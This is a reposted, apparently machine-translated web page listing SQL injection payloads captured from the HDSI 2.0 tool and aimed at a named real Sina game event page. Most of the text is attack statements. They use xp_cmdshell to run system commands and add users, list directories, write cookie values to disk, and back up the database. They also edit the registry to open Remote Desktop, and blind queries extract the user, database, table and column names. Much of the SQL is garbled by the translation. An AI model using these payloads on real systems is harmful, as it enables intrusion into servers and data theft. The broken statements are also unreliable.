The injection section of the Hdsi2.0 SQL packet-capture parsing statement
Redo cmd
; Insert TB1 exec master. xp_cmdshell ' net user '--
exec master.dbo.sp_addextendedproc ' xp_cmdshell ', ' xplog70.dll '--
Execute command:
SQL:; ipconfig-all--
Dos:
;D ROP table comd_list; CREATE TABLE comd_list (comresult nvarchar ()) INSERT comd_list EXEC MASTER: xp_cmdshell
"Ipconfig
-all "--
get/plaza/event/new/crnt_event_view.asp?event_id=57
and (Select char (94) +cast (Count (1) as varchar (8000)) +char (94) from [Comd_list] Where 1=1) >0
Column directory:
C:jiaozhu temporary table
;d ROP table Jiaozhu; CREATE TABLE Jiaozhu (DirName varchar), Diratt varchar (+), Dirfile varchar) INSERT Jiaozhu
Exec
MASTER.. Xp_dirtree "C:", 1,1--
get/plaza/event/new/crnt_event_view.asp?event_id=57
and (Select char (94) +cast (Count (1) as varchar (8000)) +char (94) from [Jiaozhu] Where 1=1) >0
Upload file:
Local path: C:\Inetpub\wwwroot\cook.txt save location: C:
Database stored procedures:
; EXEC master. xp_cmdshell ' Echo
cdb_sid=3urzov;%20cdb_cookietime=2592000;%20cdb_auth=vgccbajbvqxvavmcvghtbfjuuqydbqdtv1bwvqokaqe6pwnx;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=d8d>c:\ '--
Database backup: (delete temporary table after upload)
;D ROP Table [xiaopan];create table [dbo]. [Xiaopan] ([cmd] [text])--
Insert into Xiaopan (cmd) VALUES (' Echostr ')--
;d eclare @a sysname,@s nvarchar (4000) Select @a=db_name (), @s= ' c:/' backup database @a to [e-Mail protected] with
differential,format--
;D ROP Table [xiaopan]--
Open 3389:
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' Software\microsoft\windows\currentversion\netcache ', ' Enable ', ' REG_SZ ', ' 0 ';-
---
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite @r, "SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon ', ' ShutdownWithoutLogon ', ' REG_SZ ', ' 0 ';----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' Software\policies\microsoft\windows\installer ', ' enableadmintsremote ', ' REG_DWORD ', 1;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite @r, "System\currentcontrolset\control
\terminal
Servert ', ' senabled ', ' REG_DWORD ', 1;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' System\currentcontrolset\services\termdd ', ' Start ', ' REG_DWORD ', 2;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' System\currentcontrolset\services\termservice ', ' Start ', ' REG_DWORD ', 2;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite ' hkey_users ', '. DEFAULT\Keyboard
Layout\toggle ', ' hotkey ', ' REG_SZ ', ' 1 ';----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. xp_cmdshell ' iisreset/reboot ';----
Injection Analysis: Digital SQL error prompt to turn off open access
Use the keyword Gem Park "You play me to smoke" List of winners announced
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57
Multi-sentence query support
Sub-query support
Permissions Public
Current USER dbo
Current Library Event
; Create table T_jiaozhu (Jiaozhu varchar (200))
and 1=1
and 1=2
and (select Count (1) from SYSObjects) >0
and (select Len (user)) <32
;d eclare @a int--
and (Is_srvrolemember (' sysadmin ')) =1
and (Is_member ("db_owner")) =1
and (select Len (user)) <16
and (select Len (user)) <4
and (select Len (user) <2
and (select Len (user)) <3
and (select Len (user)) <3
and (select Len (user)) <4
and (select ASCII (substring (user,1,1))) <80
and (select ASCII (substring (user,2,1))) <80
and (select ASCII (substring (user,3,1))) <80
and (select ASCII (substring)) user,1,1
and ( Select ASCII (substring (user,2,1))) <104
and (select ASCII (substring (user,3,1))) <104
and (select ASCII ( SUBSTRING (user,1,1))) <92
and (select ASCII (substring (user,2,1))) <92
and (select ASCII (substring (user, 3,1)) <116
and (select ASCII (substring (user,1,1))) <98
...
...
...
and (Select Len (db_name ())) <16
and (Select Len (db_name ())) <8
and (Select Len (db_name ())) <4
...
...
...
and (Select ASCII (substring (db_name (),)) <80
and (Select ASCII (substring (db_name (), 2,1)) <80
and (Select ASCII (substring (db_name (), 5,1)) <85
Cross-Library:
To guess the database:
GET
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <8
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <4
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <6
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <7
...
...
...
and (select top 1 ASCII (substring (name,2,1)) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY
dbid
DESC) <104
and (select top 1 ASCII (substring (name,3,1)) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY
dbid
DESC) <104
...
...
...
and (select top 1 len (name) from (select Top 4 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <5
Master is not SA permission and cannot be cross-Library
Guess the table name:
EventCategory
GET
and (select top 1 Unicode (substring (name,2,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char (85))
T
ORDER BY id DESC) < 80
and (select top 1 Unicode (substring (name,11,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char
()) T
ORDER BY id DESC) < 80
and (select top 1 Unicode (substring (name,12,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char
()) T
ORDER BY id DESC) < 80
and (select top 1 Unicode (substring (name,6,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char (85))
T
ORDER BY id DESC) < 80
Guess the column name:
GET
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <32
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <48
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <56
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <60
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <62
and (select top 1 len (name) from (select top 1 a.id,a.name from EVENT: Syscolumns a,event. sysobjects B where
A.id=b.id and
B.name= ' EventCategory ' ORDER by a.name Desc] T ORDER BY name ASC) <35
Reprinted from: http://www.aspnetjia.com/Cont-204.html
The injection section of the Hdsi2.0 SQL packet-capture parsing statement